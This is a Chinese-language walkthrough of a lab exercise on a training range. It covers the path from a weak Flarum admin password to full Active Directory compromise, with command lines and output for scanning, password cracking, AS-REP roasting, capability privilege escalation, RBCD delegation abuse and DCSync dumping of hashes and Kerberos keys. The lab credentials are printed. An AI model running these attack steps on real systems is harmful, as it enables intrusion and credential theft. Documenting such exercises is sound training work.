春秋云镜——Flarum
0x01 信息收集
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-04-29 16:20:51] [INFO] 暴力破解线程数: 1
[2025-04-29 16:20:51] [INFO] 开始信息扫描
[2025-04-29 16:20:51] [INFO] 最终有效主机数量: 1
[2025-04-29 16:20:51] [INFO] 开始主机扫描
[2025-04-29 16:20:51] [INFO] 有效端口数量: 233
[2025-04-29 16:20:51] [SUCCESS] 端口开放 39.99.151.97:110
[2025-04-29 16:20:51] [SUCCESS] 端口开放 39.99.151.97:22
[2025-04-29 16:20:51] [SUCCESS] 服务识别 39.99.151.97:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3.]
[2025-04-29 16:20:52] [SUCCESS] 端口开放 39.99.151.97:80
[2025-04-29 16:20:53] [SUCCESS] 服务识别 39.99.151.97:110 =>
[2025-04-29 16:20:59] [SUCCESS] 服务识别 39.99.151.97:80 => [http]
[2025-04-29 16:21:01] [INFO] 存活端口数量: 3
[2025-04-29 16:21:01] [INFO] 开始漏洞扫描
[2025-04-29 16:21:01] [INFO] 加载的插件: pop3, ssh, webpoc, webtitle
[2025-04-29 16:21:01] [SUCCESS] 网站标题 http://39.99.151.97 状态码:200 长度:5867 标题:霄壤社区
0x02 Flarum获取shell
第一题让我们测试后台登录口令安全性。看到主页就有个administrator的邮箱,我们拿标准字典rockyou来爆破弱密码。爆了1w多个爆出了1chris.我们登录并上网查找有无可用的Flaurm漏洞
按上述操作我们就可以获取到shell了。我们再用msf做一下持久化即可。在主机上找一下看看该怎么提权。常规的sudo与find没找到什么可提权的路子。但是我们翻到了配置文件,决定进数据库再看看。
<?php return array (
'debug' => false,
'database' =>
array (
'driver' => 'mysql',
'host' => 'localhost',
'port' => 3306,
'database' => 'flarum',
'username' => 'root',
'password' => 'Mysql@root123',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => 'flarum_',
'strict' => false,
'engine' => 'InnoDB',
'prefix_indexes' => true,
),
'url' => 'http://'.$_SERVER['HTTP_HOST'],
'paths' =>
array (
'api' => 'api',
'admin' => 'admin',
),
'headers' =>
array (
'poweredByHeader' => true,
'referrerPolicy' => 'same-origin',
),
);
0x03 capabilities查找提权信息
但是数据库内也没有flag或潜在的用户账密。转向新的Linux提权方式,我们尝试使用capabilities来提权
www-data@web01:~/html$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
可以使用openssl来提权,因为cap_net_bind_service权限允许我们使用openssl开端口来获得指定文件的内容。至此可获得flag1.
www-data@web01:/$ openssl enc -in "/root/flag/flag01.txt"
openssl enc -in "/root/flag/flag01.txt"
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
flag01: flag{5d0d0068-2e33-4ec5-961d-5d44754d7665}
0x04 内网大保健
我们扫一下内网。
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.15 is alive
(icmp) Target 172.22.60.42 is alive
(icmp) Target 172.22.60.8 is alive
(icmp) Target 172.22.60.52 is alive
[*] Icmp alive hosts len is: 4
172.22.60.8:445 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:139 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.8:135 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.52:8083 open
172.22.60.52:8081 open
172.22.60.8:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[->]169.254.92.116
[*] NetBios 172.22.60.8 [+] DC:XIAORANG\DC
[*] NetBios 172.22.60.15 XIAORANG\PC1
[*] NetBios 172.22.60.42 XIAORANG\FILESERVER
[*] NetInfo
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[->]169.254.34.219
[*] NetInfo
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.118.249
[*] WebTitle https://172.22.60.52:8083 code:200 len:260 title:None
[*] WebTitle https://172.22.60.52:8081 code:200 len:260 title:None
[*] WebTitle http://172.22.60.52 code:200 len:5867 title:霄壤社区
已完成 14/14
回想起之前我们在数据库中获取到的若干用户名,此处又没有其他入口web服务,我们先来试一试AS-REP
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -usersfile user.txt -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$zhangxin@XIAORANG.LAB:a3599f8e07ea08e6cfddcf111b3461d8$6d9d76cd7f134857892884bf80577fddc553f316025338cd960c0948ce5f3574672b53386939b56697a68d30e07128c77531da64f2242041212cdfe82b6a48a63633b3ccda6b696f96c05dfb19d4b6f6411aeb023ff0d63bd33de580bbd3aea95701c556a4ad693a11ca33b99f13d060e48d8143849dbf1135838551abc258d2f20ce4a565a6746a7f58d71d10502fb52bcceb12b6466e0d033c95a270c48fc40a241be33bbce9d27dd69576e6e05d1aaf617ef403bd7d33096ca74a5aed257d69b6bc7d7453a2d4114945db7cfbb92c73d8f6c7f7e207e3ab43cf29db4d6a6fcc76fb8b779eaa02f27eef5f
$krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33d535b91c819dccb9$493fdecfafb796c653fd8c3079efd515c50e86aed100ca6bb0aa13cfdaa99a1b333329e286f4e5728e7d2ef44bfa4891d2aec08c62b36d5f2ec5bad1803a71ee49f80fc7c3780d145cd055e9ad3a2e593ff68121175b232ce22f9391730d4bdd94c074f31fa5e3def9e118e130abd08bc483e61ad5fa8e9cd0bdef7f6f8eb8d7e382e9f37c35fe2b016969ca58f2373acb54d810e56708e77b3692306ab4eb57b630ae4341a1a666b87b2d50cbe799fcd0d57dff36c0b266e8e9365b65bd60f7d235c24f4f06067a671ecf52a0fd2146fe828649db05c6aeba9a263b315d7ef8de2d8df7d977fc50fb68af85
成功得到了两个,我们尝试将这两个用户的密码爆出来.仅wangyun:Adm12geC可得到,我们还可以直接通过AS-REP去做keberoasting,但感觉不会这么难,所以我们就先拿wangyun做探测了。
$krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33d535b91c819dccb9$493fdecfafb796c653fd8c3079efd515c50e86aed100ca6bb0aa13cfdaa99a1b333329e286f4e5728e7d2ef44bfa4891d2aec08c62b36d5f2ec5bad1803a71ee49f80fc7c3780d145cd055e9ad3a2e593ff68121175b232ce22f9391730d4bdd94c074f31fa5e3def9e118e130abd08bc483e61ad5fa8e9cd0bdef7f6f8eb8d7e382e9f37c35fe2b016969ca58f2373acb54d810e56708e77b3692306ab4eb57b630ae4341a1a666b87b2d50cbe799fcd0d57dff36c0b266e8e9365b65bd60f7d235c24f4f06067a671ecf52a0fd2146fe828649db05c6aeba9a263b315d7ef8de2d8df7d977fc50fb68af85:Adm12geC
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33...68af85
Time.Started.....: Tue Apr 29 18:04:14 2025 (0 secs)
Time.Estimated...: Tue Apr 29 18:04:14 2025 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 44124.8 kH/s (1.46ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3933082/14344386 (27.42%)
Rejected.........: 922/3933082 (0.02%)
Restore.Point....: 1966135/14344386 (13.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: bradyp -> se803113
Hardware.Mon.#1..: Temp: 30c Util: 8% Core:1500MHz Mem:14001MHz Bus:8
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q crackmapexec smb 172.22.60.15 -d xiaorang.lab -u wangyun -p Adm12geC
SMB 172.22.60.15 445 PC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:PC1) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.60.15 445 PC1 [+] xiaorang.lab\wangyun:Adm12geC
0x05 xshell提取密码
仅在PC1上可通过认证。我们登陆一下PC1来拿一下flag,结果大失所望根本没有flag,代表我们还得继续提权。priv和groups内没有发现有效信息,我们转向BloodHound来查找。也没有明显发现。观察到桌面上还有个xshell,那我们尝试抓一下它的密码。
一抓就抓到了zhangxin:admin4qwY38cc,我们切换到此用户登录
接下来分析我们刚刚薅出来的BloodHound,查看到zhangxin对Fileserver有genericall权限。尝试打一下RBCD或者shadow credentials.
┌──(root㉿kali)-[~]
└─# proxychains4 -q addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -computer-name gailo\$ -computer-pass 123456 -dc-host DC.xiaorang.lab -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account gailo$ with password 123456.
┌──(root㉿kali)-[~]
└─# proxychains4 -q rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to fileserver\$ -delegate-from gailo\$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] gailo$ can now impersonate users on fileserver$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] gailo$ (S-1-5-21-3535393121-624993632-895678587-1116)
┌──(root㉿kali)-[~]
└─# proxychains4 -q getST.py -dc-ip 172.22.60.8 -spn cifs/Fileserver.xiaorang.lab -impersonate Fileserver\$ xiaorang.lab/gailo\$:123456
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Fileserver$
/usr/local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Fileserver$@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
我们就可以拿到flag03辣
因为有DCsync权限,所以我们直接secretsdump就可以获得administrator的NTLM了
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:80b4e1ddf6eefa113be0b357d1242976:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM
0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...)
0010 3E B6 CC 22 FF B7 C5 74 7F E4 B0 AD E7 FA 90 0D >.."...t........
0020 1B 77 20 D5 A6 67 31 E9 9E 38 DD 95 B0 60 32 C4 .w ..g1..8...`2.
0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up...
[*] Stopping service RemoteRegistry
然后哈希传递攻击登录就可以辣.请注意,上面的Administrator是Fileserver本地的Administrator的hash。我们需要用Fileserver的hash去请求一次DCsync才可以
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683
Administrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9
Administrator:des-cbc-md5:f72a9889a18cc408
[*] Cleaning up..
